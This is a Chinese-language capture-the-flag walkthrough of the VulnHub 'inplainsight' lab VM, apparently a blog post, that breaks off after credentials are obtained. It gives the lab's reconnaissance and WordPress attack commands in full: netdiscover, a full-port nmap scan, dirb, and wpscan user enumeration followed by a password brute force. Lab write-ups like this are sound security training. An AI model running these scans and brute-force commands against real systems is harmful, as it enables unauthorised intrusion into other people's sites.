今天实践的是vulnhub的inplainsight镜像,下载地址,https://download.vulnhub.com/inplainsight/inplainsight1.ova,用virtualbox导入成功,做地址扫描,sudo netdiscover -r 192.168.0.0/24,获取到靶机地址192.168.0.176,继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.176,获取到靶机有80端口的http服务,浏览器访问http://192.168.0.176,提示了index.htnl页面,浏览器访问http://192.168.0.176/index.htnl,点击图片,点击Upload Image,查看页面源码,对编码进行明文转换,echo c28tZGV2LXdvcmRwcmVzcw== | base64 -d,获取到so-dev-wordpress路径,对路径进行扫描,dirb http://192.168.0.176/so-dev-wordpress,确认是wordpress,扫描用户,wpscan --url http://192.168.0.176/so-dev-wordpress --enumerate u,获取到mike和admin,进行密码暴破,wpscan --url http://192.168.0.176/so-dev-wordpress -U mike,admin -P /usr/share/wordlists/dirb/common.txt,获取到用户名密码admin/admin1,
………………………………